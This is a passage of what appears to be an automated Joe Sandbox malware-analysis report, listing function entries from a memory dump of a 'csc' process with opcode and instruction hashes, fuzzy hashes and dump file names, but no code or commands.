                                                                                                                                                                        • Opcode Fuzzy Hash: 44ff88fff6cae04bcbfda7b5bbb483234d91ca951106f4e7c4a8d4b175bcfb6c
                                                                                                                                                                        • Instruction Fuzzy Hash: 2821F876B00615ABE3329F18C408B9ABBF5FFC5B50F150829AA559B750DBB0DC00CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 224d2fb93b578ca1a0f7a5c3cd3601b0858d27a1005699849bdc6132b3f7983d
                                                                                                                                                                        • Instruction ID: 9bbcad147d751092b38e62b8eb2013171894952587bbca8a320af5a0f4367c49
                                                                                                                                                                        • Opcode Fuzzy Hash: 224d2fb93b578ca1a0f7a5c3cd3601b0858d27a1005699849bdc6132b3f7983d
                                                                                                                                                                        • Instruction Fuzzy Hash: A3426C71A402198FEB24CF69C881BADB7F6FF88310F248199E949EB741DB349985CF50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a53d63eda18d02c0c742c617d037fea2bc47c8495a845cd39e42fe987ce8f294
                                                                                                                                                                        • Instruction ID: baed9e17e0ea267289761e747c4905a6affe91a221dfbc372968cfa683830512
                                                                                                                                                                        • Opcode Fuzzy Hash: a53d63eda18d02c0c742c617d037fea2bc47c8495a845cd39e42fe987ce8f294
                                                                                                                                                                        • Instruction Fuzzy Hash: F1229135B042168FCB19DF58C490ABAB7B2BF8A314B28466DD856DB745DB30E943CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 3283b5dbcd86c4d4d0649c022993380b64f21b887fc17a8b4ea7606aa9163a97
                                                                                                                                                                        • Instruction ID: d951554a4bc638338de674a9b1ed51098b016c9b325985c988c1d286127b5815
                                                                                                                                                                        • Opcode Fuzzy Hash: 3283b5dbcd86c4d4d0649c022993380b64f21b887fc17a8b4ea7606aa9163a97
                                                                                                                                                                        • Instruction Fuzzy Hash: 5BE18F75608341CFC714CF6CC094A6ABBE1FF89314F0589ADE9998B351DB31EA45CB92
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4f8d8693c17e755836f0ebb41f16bb5cc68ed9c6dceb624c2f71a6f8fa26ec65
                                                                                                                                                                        • Instruction ID: 59bc8957c5ed539490820d815c04ddfa3a2b43ef5aec3adef7b64936a7f10bcb
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f8d8693c17e755836f0ebb41f16bb5cc68ed9c6dceb624c2f71a6f8fa26ec65
                                                                                                                                                                        • Instruction Fuzzy Hash: 08C18271A046169FDF14CF99C844BBABBB6BF84710F1482ADD815EB780DB74A941CB81
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 407a903d11a89ae3113c23b62492b7bcef2491d860d9754c9d73e290751e6db3
                                                                                                                                                                        • Instruction ID: 84950ca677c9e19798a2335ba8c3949c8df6f09078141b51a3e6f73662deeabb
                                                                                                                                                                        • Opcode Fuzzy Hash: 407a903d11a89ae3113c23b62492b7bcef2491d860d9754c9d73e290751e6db3
                                                                                                                                                                        • Instruction Fuzzy Hash: A8C1DC72A052258BDB34CF1CC4A4BB9B7A2FF84714F194159EC479B7A1EB318981CBB0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                        • Instruction ID: ea96331bc8a8fc49305e2877672c6926713304bcf7ec7c245cf5f9229a69ae70
                                                                                                                                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                        • Instruction Fuzzy Hash: C4B1E232704A55EFDB25DB68C858BBEFBF6BF84200F140559D5529B391EB30EA41CBA0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b308799695d9ebf321cdd3cead2869d7322c1dedf6aa5ef2c743a1c5be5d6cab
                                                                                                                                                                        • Instruction ID: 332025032cce4c8792178a63623106ab66a9b378d8e75dc9c70487c236b196eb
                                                                                                                                                                        • Opcode Fuzzy Hash: b308799695d9ebf321cdd3cead2869d7322c1dedf6aa5ef2c743a1c5be5d6cab
                                                                                                                                                                        • Instruction Fuzzy Hash: CCB16270B042568BEB34CF54C894BB9B3B6FF84704F0485EAD44AE7280EB709E85CB65
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9fb0c3cd215fd39b8ce1f2352040952994d5dc2fa817d15fae1c7b8b01d410ac
                                                                                                                                                                        • Instruction ID: 3176883ec214794f724cef3556c203e1022a94059dc26a49b5d4da3becb31836
                                                                                                                                                                        • Opcode Fuzzy Hash: 9fb0c3cd215fd39b8ce1f2352040952994d5dc2fa817d15fae1c7b8b01d410ac
                                                                                                                                                                        • Instruction Fuzzy Hash: 58A11531F14A689FEB25DB58C84AFAEBBBABF01754F050125E901AB290DB749D40CBD1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 70387c3fa08bf0e294f858670f8726af281e7d006734c163987ca8974d878609
                                                                                                                                                                        • Instruction ID: bc9b33e74fdd44e3f3eb09483d3904bb41eafffd1dca4c2d7ea44fe6111bcbbb
                                                                                                                                                                        • Opcode Fuzzy Hash: 70387c3fa08bf0e294f858670f8726af281e7d006734c163987ca8974d878609
                                                                                                                                                                        • Instruction Fuzzy Hash: 47A1CC72A14211AFCF29DF18C984B6AB7EAFF88705F010928F585DB750DB74E842CB91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a1f8cc47a7fddf9b2f8b8bba3229e6a8cc6120fd412d7890a05688a65159bcb8
                                                                                                                                                                        • Instruction ID: 964fdf1a23dcabb989b520d53c9a1791e1e2d30522b5c85f3e70ab3c04a27211
                                                                                                                                                                        • Opcode Fuzzy Hash: a1f8cc47a7fddf9b2f8b8bba3229e6a8cc6120fd412d7890a05688a65159bcb8
                                                                                                                                                                        • Instruction Fuzzy Hash: F3B15D74A042158FDF24CF98D581BA9BBB2BF48354F14559DE8229B392DB35E882CF90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0d71ce7648105c2f0d575bc89d19eb9d20fcff7265b4d12b46a0f48e7358a2a8
                                                                                                                                                                        • Instruction ID: 6c23a23b6649694d1594207975dbdb63c416f99d071bfcb777de605c5f15cfeb
                                                                                                                                                                        • Opcode Fuzzy Hash: 0d71ce7648105c2f0d575bc89d19eb9d20fcff7265b4d12b46a0f48e7358a2a8
                                                                                                                                                                        • Instruction Fuzzy Hash: 5AB102756087418FD364CF68C480A6AFBE1BB88304F184A6EF89AC7352D771E945CB96
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                                                                        • Instruction ID: 795db8703ed58e62813acdef3c8cb5c453c1038ab74504c667c9e427c7e57e7f
                                                                                                                                                                        • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                                                                        • Instruction Fuzzy Hash: BD717C35A0421E9BDF24CF64C480ABFB7BABF44750F59419AE841AB761F734E981CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b19b9015a6768f0d1ccb91e0aec0aa27c6ee930a6efc7b01b8808c1ba0b9306d
                                                                                                                                                                        • Instruction ID: 3e82ed37163b927c6b646b5d6689fc6aa4aab3008ebf8b7df005b5c740dfb659
                                                                                                                                                                        • Opcode Fuzzy Hash: b19b9015a6768f0d1ccb91e0aec0aa27c6ee930a6efc7b01b8808c1ba0b9306d
                                                                                                                                                                        • Instruction Fuzzy Hash: 5D71CC76D14629DBDB25CF58C990BBEFBB2FF48700F14491AE842AB350E7349844CBA0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2a2ef7b8fdde8f890e7fb8dcb7705b592b749e90e47fc45aceb1124cd0292f06
                                                                                                                                                                        • Instruction ID: 3d219de68245199af6ceb8cb8ed55a02b7d42e5b9901ce5a983f2575af8601c6
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a2ef7b8fdde8f890e7fb8dcb7705b592b749e90e47fc45aceb1124cd0292f06
                                                                                                                                                                        • Instruction Fuzzy Hash: 48719D7A7046528FD321DF28C484B6AF7E6FF84310F0585AAE899CB351DB74D846CBA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 1fccd3b90fb0ed6bf37a336564751a7cc50b44c9eba5ce3918468c71ad678399
                                                                                                                                                                        • Instruction ID: c6b0b9848e181629a4150574e1522313aa02df09447f793fc1f130045bf9c36f
                                                                                                                                                                        • Opcode Fuzzy Hash: 1fccd3b90fb0ed6bf37a336564751a7cc50b44c9eba5ce3918468c71ad678399
                                                                                                                                                                        • Instruction Fuzzy Hash: 01612C75A14506AFDB18DFA8C490AADFBB6FB89300F1486AED519A7740DB30A941CFD0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 86aa7672dbc34a5afcc990d910660b586b556d561852376d85a70a74b59c5fda
                                                                                                                                                                        • Instruction ID: c88b133c21bbf4396ebe2dfe368bf37eaf679450acbe52a08e769286884ac060
                                                                                                                                                                        • Opcode Fuzzy Hash: 86aa7672dbc34a5afcc990d910660b586b556d561852376d85a70a74b59c5fda
                                                                                                                                                                        • Instruction Fuzzy Hash: 1151F2B16042159FEB24EF24C89AF6B7BB9FF85724F10062DF91197291DB30E941CBA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                                                                                                        • Instruction ID: b7eec21852b17e986a29f74b2fb0572a9c3e8fc805365ec7986761695d34ec6d
                                                                                                                                                                        • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                                                                                                        • Instruction Fuzzy Hash: E051EFB66042129BCB11EF648C46ABB7BF6FF89280F040829F94587651E634C896C7E2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: d946bc8124b3c5fb270f19241b87f55d1b0f979df549b945540cc63a76989518
                                                                                                                                                                        • Instruction ID: 39fef390bcb14235b28f33642788e0bea3fe42cadbe6e704b262a9d448efdc15
                                                                                                                                                                        • Opcode Fuzzy Hash: d946bc8124b3c5fb270f19241b87f55d1b0f979df549b945540cc63a76989518
                                                                                                                                                                        • Instruction Fuzzy Hash: 10519E71A00619AFDB21DFA5CC84FEEBBB9FF42344F20052AE594A7291DB719845DF10
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 79926a02eb088b71fc2490dc50c8dd56204ea5ec2923623e6916580188ca7cab
                                                                                                                                                                        • Instruction ID: da92311fdc47a1249e5206d67f7d2a9586fc00cb26f04fa9026b61f71e7031cc
                                                                                                                                                                        • Opcode Fuzzy Hash: 79926a02eb088b71fc2490dc50c8dd56204ea5ec2923623e6916580188ca7cab
                                                                                                                                                                        • Instruction Fuzzy Hash: 6651F276A05A16AFC721CF6CC480A69F7B1FF44710F064A65E845DB740E734E991CBE1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: 09dc0cea41d99075662b2d44526332364f027fdd367d24c06fa4be0c13267d86
                                                                                                                                                                        • Instruction ID: c70ca43765a22628987e7a308e3caef85ae40c86d51ca2e5cbd67c95e3f96950
                                                                                                                                                                        • Opcode Fuzzy Hash: 09dc0cea41d99075662b2d44526332364f027fdd367d24c06fa4be0c13267d86
                                                                                                                                                                        • Instruction Fuzzy Hash: 28516D72610A09DFCB61EF68C989E6AB3FEFF44740F510829E64297660D734ED40CB61
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0038a405202289c3ea3e07334e7dcb8080d86895e929d91f25caf5c1597f6d79
                                                                                                                                                                        • Instruction ID: 34423cc88cb7e62266636fe16dcd45b67bb676363269d610dab500f676049a53
                                                                                                                                                                        • Opcode Fuzzy Hash: 0038a405202289c3ea3e07334e7dcb8080d86895e929d91f25caf5c1597f6d79
                                                                                                                                                                        • Instruction Fuzzy Hash: 4151E131A14A16EFEB15DBA4C848BBDBBB6FF89311F1040ADE51393A90DB749901CF80
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
